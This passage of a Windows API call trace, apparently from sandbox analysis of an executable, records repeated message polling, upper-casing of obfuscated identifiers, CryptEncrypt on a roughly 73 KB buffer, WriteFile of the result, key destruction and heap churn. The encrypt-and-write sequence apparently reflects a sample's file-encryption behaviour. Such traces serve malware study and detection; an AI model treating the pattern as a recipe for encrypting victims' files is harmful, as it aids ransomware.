| out: lpsz="SSA5C00800A45") returned 0xd [0100.338] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0100.338] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0100.338] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0100.338] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0100.338] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.338] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.338] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.338] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.338] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0100.338] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0100.338] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0100.338] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0100.338] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0100.340] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9e38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0100.340] CryptEncrypt (in: hKey=0x9a4a00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x11fe4, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x11fe8) returned 1 [0100.340] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.340] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.340] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.340] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.340] CharLowerBuffW (in: lpsz="byte[73704]", cchLength=0xb | out: lpsz="byte[73704]") returned 0xb [0100.342] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.343] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.343] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0100.344] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0100.344] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0100.344] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0100.344] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0100.344] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.344] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.344] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9cb8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0100.344] CryptEncrypt (in: hKey=0x9a4a00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37d2038*, pdwDataLen=0x8cef60*=0x11fe4, dwBufLen=0x11fe8 | out: pbData=0x37d2038*, pdwDataLen=0x8cef60*=0x11fe8) returned 1 [0100.394] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.394] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.394] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.394] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.394] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.550] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0100.550] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0100.550] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0100.550] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0100.550] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0100.550] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.550] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.550] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0100.550] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0100.550] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0100.550] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0100.550] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0100.550] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0100.550] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0100.550] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0100.551] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0100.551] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0100.551] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0100.551] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0100.551] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0100.551] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0100.551] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0100.551] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0100.551] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0100.551] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0100.551] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0100.551] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.558] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.558] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.558] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.559] WriteFile (in: hFile=0x44c, lpBuffer=0x2a8c120*, nNumberOfBytesToWrite=0x11fe8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a8c120*, lpNumberOfBytesWritten=0x8cf5e4*=0x11fe8, lpOverlapped=0x0) returned 1 [0100.561] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.561] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.561] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0100.561] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0100.561] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0100.561] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0100.561] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0100.561] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0100.561] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0100.561] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0100.561] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0100.561] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0100.562] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0100.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aa9a30, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0100.562] CryptDestroyKey (hKey=0x9a4a00) returned 1 [0100.562] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0100.562] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0100.562] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0100.562] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0100.562] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0100.562] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0100.562] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0100.562] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0100.562] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0100.562] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0100.562] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0100.562] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0100.562] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0100.562] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0100.562] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0100.562] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0100.562] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0100.562] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0100.562] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0100.563] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0100.563] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0100.563] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0100.563] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0100.563] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0100.563] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0100.563] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0100.563] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0100.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7698 [0100.563] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0100.563] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0100.563] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0100.563] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0100.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0100.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0100.563] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0100.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0100.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0100.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0100.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0100.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0100.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0100.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0100.563] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0100.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0100.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0100.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0100.563] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0100.563] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0100.563] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0100.563] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0100.563] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0100.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0100.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0100.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0100.564] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0100.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0100.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0100.564] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0100.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0100.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0100.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bb0 [0100.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0100.564] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0100.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0100.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0100.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0100.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0100.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0100.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0100.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0100.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0100.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0100.564] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0100.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0100.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0100.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0100.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0100.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0100.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0100.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0100.564] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0100.564] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0100.564] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0100.564] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0100.565] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0100.565] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0100.565] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0100.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0100.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0100.565] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a48 [0100.565] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73db8 [0100.565] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0100.565] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0100.565] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0100.565] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0100.565] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0100.565] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0100.565] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0100.566] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0100.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0100.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0100.566] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0100.566] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0100.566] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: 